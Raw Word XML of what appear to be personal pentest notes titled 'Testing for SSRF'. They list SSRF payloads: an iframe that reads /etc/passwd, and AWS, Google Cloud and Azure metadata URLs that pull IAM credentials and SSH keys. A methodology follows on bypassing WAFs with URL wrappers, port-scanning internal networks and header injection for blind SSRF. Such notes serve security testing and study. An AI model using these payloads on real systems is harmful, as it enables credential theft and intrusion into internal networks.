      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>test.php?file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/passwd"&gt;\&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716D8DB9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E2D484"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__</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AWS:_</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FF8B6B"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http://instance-data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40945BF1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1697FEC0"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http://169.254.169.254/latest/user-data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6014C931"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3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://169.254.169.254/latest/user-data/iam/security-credentials/[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ROLE NAME]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1877348B"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http://169.254.169.254/latest/meta-data/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302786DF"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3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://169.254.169.254/latest/meta-data/iam/security-credentials/[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ROLE NAME]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776DF2B3"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http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5004A720"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http://169.254.169.254/latest/meta-data/ami-id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8C5841"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http://169.254.169.254/latest/meta-data/reservation-id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C22A973"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http://169.254.169.254/latest/meta-data/hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CB99F1"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http://169.254.169.254/latest/meta-data/public-keys/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DD5B17"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http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FC3F19"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3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://169.254.169.254/latest/meta-data/public-keys/[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ID]/openssh-key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430D6F55"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http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7574F421"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http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B06538" w14:textId="3E954A32"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http://169.254.169.254/latest/dynamic/instance-identity/document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0527F841"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696B8018"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 xml:space="preserve">__Google </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Cloud:_</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C3077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1E188C"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http://169.254.169.254/computeMetadata/v1/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A0880E"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http://metadata.google.internal/computeMetadata/v1/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9048B7"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http://metadata/computeMetadata/v1/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30428732"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http://metadata.google.internal/computeMetadata/v1/instance/hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0349669B"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http://metadata.google.internal/computeMetadata/v1/instance/id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287DE06A" w14:textId="004C3463"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http://metadata.google.internal/computeMetadata/v1/project/project-id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0017135C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104E6387"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Azure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4CE0E0"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http://169.254.169.254/metadata/v1/maintenance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625BC6A9"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http://169.254.169.254/metadata/instance?api-version=2017-04-02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC15D3B" w14:textId="068273BD"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t>http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&amp;format=text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472288F5" w14:textId="77777777" w:rsidR="003C3077" w:rsidRPr="003C3077" w:rsidRDefault="003C3077" w:rsidP="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077">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>--------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F74EBF4" w14:textId="7FBA96AD" w:rsidR="003C3077" w:rsidRDefault="00F518CD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="343376AA" wp14:editId="1BF0EA45">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-8627</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>53711</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="565030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6503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19979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pt,4.25pt" to="444.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" strokecolor="black [3200]" strokeweight=".5pt">
                <v:stroke joinstyle="miter"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE07AEB" w14:textId="0A5E3D79" w:rsidR="003C3077" w:rsidRDefault="00AB2CF7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5C690553" wp14:editId="289B1129">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-63661</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3414532</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5804704" cy="11574"/>
                <wp:effectExtent l="0" t="0" r="24765" b="26670"/>
                <wp:wrapNone/>
                <wp:docPr id="4" name="Straight Connector 4"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipV="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="5804704" cy="115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A58F4C"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pt,268.85pt" to="452.05pt,2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" strokecolor="black [3200]" strokeweight=".5pt">
                <v:stroke joinstyle="miter"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F518CD" w:rsidRPr="00F518CD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6766DD8E" wp14:editId="4FA1AF52">
            <wp:extent cx="4537494" cy="3390790"/>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4547798" cy="3398490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E4AAF5" w14:textId="77777777" w:rsidR="007642C2" w:rsidRDefault="007642C2"/>
    <w:p w14:paraId="01F95868" w14:textId="77777777" w:rsidR="007642C2" w:rsidRDefault="007642C2"/>
    <w:p w14:paraId="72A94A5F" w14:textId="77777777" w:rsidR="007642C2" w:rsidRDefault="007642C2"/>
    <w:p w14:paraId="35DB972A" w14:textId="77777777" w:rsidR="007642C2" w:rsidRDefault="007642C2"/>
    <w:p w14:paraId="5822BF5E" w14:textId="77777777" w:rsidR="007642C2" w:rsidRDefault="007642C2"/>
    <w:p w14:paraId="4F7B5D2D" w14:textId="77777777" w:rsidR="007642C2" w:rsidRDefault="007642C2"/>
    <w:p w14:paraId="384FDFB9" w14:textId="77777777" w:rsidR="007642C2" w:rsidRDefault="007642C2"/>
    <w:p w14:paraId="0C0B9226" w14:textId="77777777" w:rsidR="007642C2" w:rsidRDefault="007642C2"/>
    <w:p w14:paraId="1BB4D709" w14:textId="77777777" w:rsidR="007642C2" w:rsidRDefault="007642C2"/>
    <w:p w14:paraId="330B4D51" w14:textId="77777777" w:rsidR="007642C2" w:rsidRDefault="007642C2"/>
    <w:p w14:paraId="05F5F173" w14:textId="77777777" w:rsidR="007642C2" w:rsidRDefault="007642C2"/>
    <w:p w14:paraId="776ED029" w14:textId="77777777" w:rsidR="007642C2" w:rsidRDefault="007642C2"/>
    <w:p w14:paraId="0CA46263" w14:textId="77777777" w:rsidR="007642C2" w:rsidRDefault="007642C2"/>
    <w:p w14:paraId="1E90B641" w14:textId="77777777" w:rsidR="007642C2" w:rsidRDefault="007642C2"/>
    <w:p w14:paraId="6EE3D4E5" w14:textId="53C3EE10" w:rsidR="00873413" w:rsidRDefault="001D42CB">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB2CF7">
        <w:t xml:space="preserve">Testing: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC1E933" w14:textId="77777777" w:rsidR="00D355A6" w:rsidRDefault="00AB2CF7">
      <w:r w:rsidRPr="00AB2CF7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="480B95B2" wp14:editId="49E5C283">
            <wp:extent cx="4218915" cy="4298402"/>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4219742" cy="4299245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="175BBFD6" w14:textId="06FD708C" w:rsidR="00AB2CF7" w:rsidRDefault="003E1C00">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="59F5487E" wp14:editId="022CAD35">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-63375</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3150606</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5504507" cy="36214"/>
                <wp:effectExtent l="0" t="0" r="20320" b="20955"/>
                <wp:wrapNone/>
                <wp:docPr id="5" name="Straight Connector 5"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipV="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="5504507" cy="362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33C14"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5pt,248.1pt" to="428.45pt,2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" strokecolor="black [3200]" strokeweight=".5pt">
                <v:stroke joinstyle="miter"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D355A6" w:rsidRPr="00D355A6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="485F17C8" wp14:editId="691FCD4B">
            <wp:extent cx="4786620" cy="2906162"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4797377" cy="2912693"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D3575F" w14:textId="1DCB9DF0" w:rsidR="003E1C00" w:rsidRDefault="003E1C00" w:rsidP="003E1C00">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2776C0DA" w14:textId="0D9B9A0D" w:rsidR="003E1C00" w:rsidRDefault="003E1C00" w:rsidP="003E1C00">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">We can use SSRF to port scan the entire internal network which we can use to locate other servers that for example have an open port on 80 or 443. Or other open ports which we can use to possible gain remote code execution or other exploits. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6A2A65" w14:textId="2B7B2B74" w:rsidR="00F357C4" w:rsidRDefault="003E1C00" w:rsidP="003E1C00">
      <w:r>
        <w:t xml:space="preserve">If you see </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> IP address, hostname or URL in a parameter make sure to test it! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FCF101" w14:textId="48E9745B" w:rsidR="00F357C4" w:rsidRDefault="00F357C4" w:rsidP="003E1C00">
      <w:r>
        <w:t xml:space="preserve">Test Steps: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F219D87" w14:textId="0D23E14A" w:rsidR="00F357C4" w:rsidRDefault="00F357C4" w:rsidP="00F357C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Map the application with burp – FULLY! Take your time and learn the app </w:t>
      </w:r>
      <w:r w:rsidR="00053DBD">
        <w:t>logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C64B86B" w14:textId="34867BAC" w:rsidR="00F357C4" w:rsidRDefault="00F357C4" w:rsidP="00F357C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identify all parameters containing hostnames, IPs or full </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>URLs</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="26433A45" w14:textId="6549C785" w:rsidR="00053DBD" w:rsidRDefault="00053DBD" w:rsidP="00F357C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identify the IP of the server and try to find the ASN to identify as much info about the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>servers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> internal network as possible. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E755D45" w14:textId="6575DAD9" w:rsidR="00F357C4" w:rsidRDefault="00F357C4" w:rsidP="00F357C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once these parameters are identified its time to test each parameter. Probably best to start with repeater to see how the WAF functions a little and tailor your subsequent requests accordingly. </w:t>
      </w:r>
      <w:r w:rsidR="00053DBD">
        <w:t xml:space="preserve">(Use sublime to easily change a big list) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE74413" w14:textId="30415870" w:rsidR="00F357C4" w:rsidRDefault="00053DBD" w:rsidP="00F357C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>If there</w:t>
      </w:r>
      <w:r w:rsidR="00F357C4">
        <w:t xml:space="preserve"> is a WAF (which there usually is) start by testing </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the wrappers to see which are allowed. These include http://, https://, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>file:/// ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dict://, sftp://,ldap://,tftp:// and gopgher:// among others. This shows us what type of functionality the exploit will provide and help us to craft our payload accordingly. See </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="000A11BB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> for more info on these headers. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EA926F" w14:textId="7162EEAA" w:rsidR="00053DBD" w:rsidRDefault="00053DBD" w:rsidP="00F357C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Carefully check the response from each request to see how the application responds. If you notice defenses look up payload variations. There is a lot out there but compiling a list usually doesn’t work super well as they usually must be changed very often. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6AE910" w14:textId="6BB26328" w:rsidR="00053DBD" w:rsidRDefault="00053DBD" w:rsidP="00053DBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If these regular tests don’t work, use </w:t>
      </w:r>
      <w:r w:rsidR="008B5E59">
        <w:t xml:space="preserve">a server to try to locate blind </w:t>
      </w:r>
      <w:r w:rsidR="009B0B52">
        <w:t>vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13240AA7" w14:textId="3AF2AC74" w:rsidR="00324A98" w:rsidRDefault="00324A98" w:rsidP="00324A98">
      <w:r>
        <w:t xml:space="preserve">Injecting URLs or often even better, malformed URLs, into various http headers can often cause pingbacks, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> lookups or GET requests send back to a domain of your choosing. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207E32B4" w14:textId="1B2B1C9D" w:rsidR="00EC5384" w:rsidRDefault="00324A98" w:rsidP="00324A98">
      <w:r>
        <w:t>Especially the Host</w:t>
      </w:r>
      <w:r w:rsidR="00C66DA3">
        <w:t>, X-Forwarded-For</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and referrer headers among many others!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2B8F8D" w14:textId="085FEBBC" w:rsidR="0048561C" w:rsidRDefault="00EC5384" w:rsidP="00324A98">
      <w:r>
        <w:t xml:space="preserve">Think of testing for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssrf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> like attacking the function responsible for parsing the URL that we pass into it via user supplied input </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> path variable or some URL parameter referenced in the request</w:t>
      </w:r>
      <w:r w:rsidR="0048561C">
        <w:t xml:space="preserve"> or http headers. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172387E0" w14:textId="2C8381FB" w:rsidR="0048561C" w:rsidRPr="003E1C00" w:rsidRDefault="0048561C" w:rsidP="00324A98">
      <w:r w:rsidRPr="0048561C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C1E3514" wp14:editId="7C5C150B">
            <wp:extent cx="3750732" cy="2413000"/>
            <wp:effectExtent l="0" t="0" r="254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3770256" cy="2425561"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0048561C" w:rsidRPr="003E1C0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6C71" w14:textId="77777777" w:rsidR="00787EBA" w:rsidRDefault="00787EBA" w:rsidP="001D42CB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="15CBF615" w14:textId="77777777" w:rsidR="00787EBA" w:rsidRDefault="00787EBA" w:rsidP="001D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1877E" w14:textId="77777777" w:rsidR="00787EBA" w:rsidRDefault="00787EBA" w:rsidP="001D42CB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1FA4B3A5" w14:textId="77777777" w:rsidR="00787EBA" w:rsidRDefault="00787EBA" w:rsidP="001D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A9DC2" w14:textId="4404E3BB" w:rsidR="001D42CB" w:rsidRDefault="001D42CB">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">Testing for SSRF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24959"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="01CAE3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609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66"/>
    <w:rsid w:val="00053DBD"/>
    <w:rsid w:val="001D42CB"/>
    <w:rsid w:val="00324A98"/>
    <w:rsid w:val="003C3077"/>
    <w:rsid w:val="003D34F8"/>
    <w:rsid w:val="003E1C00"/>
    <w:rsid w:val="0044624D"/>
    <w:rsid w:val="00447423"/>
    <w:rsid w:val="00474133"/>
    <w:rsid w:val="0048561C"/>
    <w:rsid w:val="00695BEA"/>
    <w:rsid w:val="006A6E66"/>
    <w:rsid w:val="007642C2"/>
    <w:rsid w:val="00787EBA"/>
    <w:rsid w:val="00873413"/>
    <w:rsid w:val="008B5E59"/>
    <w:rsid w:val="009B0B52"/>
    <w:rsid w:val="009B2F8F"/>
    <w:rsid w:val="00AB2CF7"/>
    <w:rsid w:val="00AC5E02"/>
    <w:rsid w:val="00AD0184"/>
    <w:rsid w:val="00C430F8"/>
    <w:rsid w:val="00C66DA3"/>
    <w:rsid w:val="00CB3042"/>
    <w:rsid w:val="00D355A6"/>
    <w:rsid w:val="00DA6347"/>
    <w:rsid w:val="00DF1F11"/>
    <w:rsid w:val="00E91909"/>
    <w:rsid w:val="00EC5384"/>
    <w:rsid w:val="00ED5BB3"/>
    <w:rsid w:val="00EE6CD2"/>
    <w:rsid w:val="00F357C4"/>
    <w:rsid w:val="00F5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0E60"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FB9E1154-5ABA-4C6B-B26B-808CEEDA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30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2CB"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
